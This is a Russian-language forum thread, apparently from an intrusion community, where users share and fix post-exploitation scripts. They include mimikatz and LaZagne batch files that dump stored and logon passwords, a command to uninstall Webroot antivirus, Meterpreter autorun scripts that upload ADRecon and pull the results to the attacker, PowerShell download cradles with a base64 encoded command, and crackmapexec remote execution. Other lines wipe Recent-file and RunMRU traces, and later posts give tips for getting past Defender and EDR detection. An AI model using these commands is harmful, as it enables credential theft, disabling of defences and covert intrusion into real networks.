Автоматизация работы в сети (список полезных скриптов)

[lucii]

>> file.txt

я не профи, но уверен, что это не батник для мимиказа и продкампа, больше похоже на команду для мимика которая сохранит результат в файл
я запуская мимика вот таким батником

cd %~dp0\x64
mimikatz.exe "log log.txt" "privilege::debug" "sekurlsa::logonpasswords" "token::elevate" "lsadump::sam" "exit"
start log.txt

но что-то тут явно неправильно, особенно с учётом, что хотелось бы туда ещё продкамп добавить

 

[tuda]

я не профи, но уверен, что это не батник для мимиказа и продкампа, больше похоже на команду для мимика которая сохранит результат в файл
я запуская мимика вот таким батником

cd %~dp0\x64
mimikatz.exe "log log.txt" "privilege::debug" "sekurlsa::logonpasswords" "token::elevate" "lsadump::sam" "exit"
start log.txt

но что-то тут явно неправильно, особенно с учётом, что хотелось бы туда ещё продкамп добавить

ладно держи
mimikatz "privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords" "exit" > log.txt

 

[anubis_050]

у кого есть ps1 скрипт, по удалению webroot?

 

[wav]

у кого есть ps1 скрипт, по удалению webroot?

psexec -s cmd
For 32 bit versions of Windows:

"C:\Program Files\Webroot\WRSA.exe" -uninstall

For 64 bit versions of Windows:

"C:\Program Files (x86)\Webroot\WRSA.exe" -uninstall

 

[DrSleep]

Подскажите по MSF плиз
1)Есть ли у метерпретера переменные сесси, допустим domain,user и тд.Для автоматизации

download folder /root/data/$DOMAIN

Чтоб каждый раз домен не писать
2)Есть ли возможность создавать свои короткие команды, чтоб не писать

run post/multi/manage/autoroute

а сделать алиас или подтягивать просто через консоль в виде короткой команды

autorout

Есть конечно родная autoroute, но в ней нужно чекать подсети, добавлять их и тд.
3)Можно ли сделать и есть ли энкодеры помимо стандартных для метерпретера, типо свой

x86/shikata_ga_nai

Спасибо.

 

[sw0rdf1sh]

x86/shikata_ga_nai , is this old and detectable ?

 

[kamzzzzz]

Подскажите по MSF плиз
1)Есть ли у метерпретера переменные сесси, допустим domain,user и тд.Для автоматизации

download folder /root/data/$DOMAIN

Чтоб каждый раз домен не писать
2)Есть ли возможность создавать свои короткие команды, чтоб не писать

run post/multi/manage/autoroute

а сделать алиас или подтягивать просто через консоль в виде короткой команды

autorout

Есть конечно родная autoroute, но в ней нужно чекать подсети, добавлять их и тд.
3)Можно ли сделать и есть ли энкодеры помимо стандартных для метерпретера, типо свой

x86/shikata_ga_nai

Спасибо.

Не совсем понятен вопрос про подтягивания, если ты хочешь автоматизировать, то зафигач простой скрипт со списком команд, которые будут выполнятся при открытии сессии в хендлере set autorunscript

 

[DrSleep]

Не совсем понятен вопрос про подтягивания, если ты хочешь автоматизировать, то зафигач простой скрипт со списком команд, которые будут выполнятся при открытии сессии в хендлере set autorunscript

Про set autorunscript все верно.Но на хэндлер постоянно идут новые хосты, допустим скрипт автоматизации

cd %appdata%
upload ADRecon.ps1
execute -f powershell.exe -a '-nologo -executionpolicy bypass -noprofile -file ADRecon.ps1 -OutputDir result -OutputType HTML' -i -H
del ADRecon.ps1
download result// /root/adrecon/ТУТ_ПОДСТАВИТЬ_ДОМЕН_СЕССИИ
rmdir result

Если прописать такой скрипт то все конекты будут качать в одну и ту же папку результат ADRecon.ps1 и перезаписывать.

По поводу алиасов в самом MSF они делаются легко, но как сделать в метерпретере быстрый запуск ненашел.
Допустим в метерпретере пишем

domain

он выполняет

execute -f powershell.exe -a 'Get-ADDomain' -i -H

 

[kamzzzzz]

Про set autorunscript все верно.Но на хэндлер постоянно идут новые хосты, допустим скрипт автоматизации

cd %appdata%
upload ADRecon.ps1
execute -f powershell.exe -a '-nologo -executionpolicy bypass -noprofile -file ADRecon.ps1 -OutputDir result -OutputType HTML' -i -H
del ADRecon.ps1
download result// /root/adrecon/ТУТ_ПОДСТАВИТЬ_ДОМЕН_СЕССИИ
rmdir result

Если прописать такой скрипт то все конекты будут качать в одну и ту же папку результат ADRecon.ps1 и перезаписывать.

По поводу алиасов в самом MSF они делаются легко, но как сделать в метерпретере быстрый запуск ненашел.
Допустим в метерпретере пишем

domain

он выполняет

execute -f powershell.exe -a 'Get-ADDomain' -i -H

resource

 

[kamzzzzz]

Народ, как через CMD/Powershell 2.0 подгрузить и запустить файл по http, либо как удаленно обновить его хотя бы до 3.0, на сколько я знаю там фраемворк еще надо обновлять.

 

[IIIIXX]

Народ, как через CMD/Powershell 2.0 подгрузить и запустить файл по http, либо как удаленно обновить его хотя бы до 3.0, на сколько я знаю там фраемворк еще надо обновлять.

# PowerShell 2.0
# set url and path
$url = "http://example.com/software/7z.exe"
$output = "C:\programdata\7z.exe"

# download
$WebRequestObj = New-Object System.Net.WebClient
$WebRequestObj.DownloadFile($url, $output)

# or
(New-Object System.Net.WebClient).DownloadFile($url, $output)

 

[kamzzzzz]

# PowerShell 2.0
# set url and path
$url = "http://example.com/software/7z.exe"
$output = "C:\programdata\7z.exe"

# download
$WebRequestObj = New-Object System.Net.WebClient
$WebRequestObj.DownloadFile($url, $output)

# or
(New-Object System.Net.WebClient).DownloadFile($url, $output)

Спасибо, скрипт рабочий. Но теперь вопрос в вопросе: так как я не могу залить туда скрипт, единственный способ писать его вручную в консоли, вот что у меня получилось:

echo $url = "ftp://192.168.0.1:21/notepad.exe" >> notepad.ps1 && echo $output = "C:\Users\kamzzzzz\Desktop\notepad.exe" >> notepad.ps1 && echo $WebRequestObj = New-Object System.Net.WebClient >> notepad.ps1 && echo $WebRequestObj.DownloadFile($url, $output) >> notepad.ps1 && echo (New-Object System.Net.WebClient).DownloadFile($url, $output) >> notepad.ps1 && powershell -command "Get-Content C:\Users\kamzzzzz\Desktop\notepad.ps1 | Powershell.exe -noprofile -" && start notepad.exe

В батнике он работает, как надо. Но когда я пытаюсь зауснуть его в батник софта, где все это еще надо в "" вынести у меня по бороде идет экранирование данного скрипта. Выносил все кавычки \"\", чет ничего не выходит, может подскажет кто не замыленным взглядом?
PS Костыли с внесением каждой строки по отдельности вынужденая мера

 

[KasperWAF]

Спасибо, скрипт рабочий. Но теперь вопрос в вопросе: так как я не могу залить туда скрипт, единственный способ писать его вручную в консоли, вот что у меня получилось:

echo $url = "ftp://192.168.0.1:21/notepad.exe" >> notepad.ps1 && echo $output = "C:\Users\kamzzzzz\Desktop\notepad.exe" >> notepad.ps1 && echo $WebRequestObj = New-Object System.Net.WebClient >> notepad.ps1 && echo $WebRequestObj.DownloadFile($url, $output) >> notepad.ps1 && echo (New-Object System.Net.WebClient).DownloadFile($url, $output) >> notepad.ps1 && powershell -command "Get-Content C:\Users\kamzzzzz\Desktop\notepad.ps1 | Powershell.exe -noprofile -" && start notepad.exe

В батнике он работает, как надо. Но когда я пытаюсь зауснуть его в батник софта, где все это еще надо в "" вынести у меня по бороде идет экранирование данного скрипта. Выносил все кавычки \"\", чет ничего не выходит, может подскажет кто не замыленным взглядом?
PS Костыли с внесением каждой строки по отдельности вынужденая мера

У повершелла есть параметр EncodedCommand. Если хочешь быстрее и без экранирования, заходишь вот сюда https://www.base64encode.org, выбираешь кодировку UTF-16-LE, вставляешь свой скрипт, он тебе выдаёт base64 строку. В итоге запускаешь следующим образом:

powershell -EncodedCommand команда

Например, следующая команда загрузит putty и сохранит ее в програмдате под названием 1.exe:

powershell -encodedcommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHQAaABlAC4AZQBhAHIAdABoAC4AbABpAC8AfgBzAGcAdABhAHQAaABhAG0ALwBwAHUAdAB0AHkALwBsAGEAdABlAHMAdAAvAHcANgA0AC8AcAB1AHQAdAB5AC4AZQB4AGUAJwAsACAAJABlAG4AdgA6AHAAcgBvAGcAcgBhAG0AZABhAHQAYQAgACsAIAAnAFwAMQAuAGUAeABlACcAKQA=

 

[smuggling]

Например, следующая команда загрузит putty и сохранит ее в програмдате под названием 1.exe:

А также блеванет алертом в едр

 

[monteray]

уже нашел решение.
#~ cme smb 172.16.251.152 -u user -p pass --put-file /tmp/whoami.bat \\Windows\\Temp\\whoami.bat
а после
-x whoami.bat

еще можно через psexec

 

[check_XYZ]

mode con: cols=50 lines=30
color 03
cls
title Grabbing pass...
off
Grabbing pass...
Do not close this window...

cd /d %~dp0
.\mimikatz.exe "privilege::debug" "log .\Result.txt" "sekurlsa::logonPasswords" "token::elevate" "lsadump::sam" "lsadump::secrets" exit
.\mimikatz\miparser.vbs .\Result.txt

REM .
REM pause > nul

Для Мимика, как один из вариантов

 

[check_XYZ]

mode con: cols=50 lines=30
color 03
cls
title Grabbing pass...
off
Grabbing pass...
Do not close this window...

cd %~dp0

md !logs
if %PROCESSOR_ARCHITECTURE%==AMD64 (

.\mimikatz\x64\mimikatz.exe "privilege::debug" "log .\!logs\Result.txt" "sekurlsa::logonPasswords" "token::elevate" "lsadump::sam" lsadump::secrets exit
) else (.\mimikatz\x32\mimikatz.exe "privilege::debug" "log Result.txt" "sekurlsa::logonPasswords" "token::elevate" "lsadump::sam" lsadump::secrets exit)
.\mimikatz\miparser.vbs .\!logs\Result.txt
start .\lazagne\lazagne.bat

Del /F /Q %APPDATA%\Microsoft\Windows\Recent\*
Del /F /Q %APPDATA%\Microsoft\Windows\Recent\AutomaticDestinations\*
Del /F /Q %APPDATA%\Microsoft\Windows\Recent\CustomDestinations\*
REG Delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /VA /F
REG Delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths /VA /F
exit

REM del mimikatz.exe /F /Q
REM del mimidrv.sys /F /Q
REM del mimilib.dll /F /Q
REM del %0

REM .
REM pause > nul

lazagne.bat:
cd %~dp0
laZagne.exe all>laZagneLog.txt
exit

или вместе с лазаньей

 

[tuda]

дак оно же все детектится у ав, куча алертов и выпила с сети такое потянет
лазань вообще елка

 

[DrSleep]

дак оно же все детектится у ав, куча алертов и выпила с сети такое потянет
лазань вообще елка

Home-Grown Red Team: Let’s Evade AV And Run Lazagne

UPDATE: There was a scaredy-cat that posted a comment on this story then immediately deleted it. The comment read “This is really terrible…

assume-breach.medium.com

Неплохо помогает, но Defender сейчас не убирает.Мб кто скинет на что деф ругается

 

[check_XYZ]

дак оно же все детектится у ав, куча алертов и выпила с сети такое потянет
лазань вообще елка

С дефедером проще всего, можно просто скачать открытый код, переписать все названия функций, убрать коменты и т.д в общем максиматьно изменить код)
Если всё равно детектит, то делить файл побитно и методом потбора искать с какого моента кода он ругаеться и заменить его
Метод долгий но рабочий

Как пример - https://mrd0x.com/bypass-static-detection-windows-defender/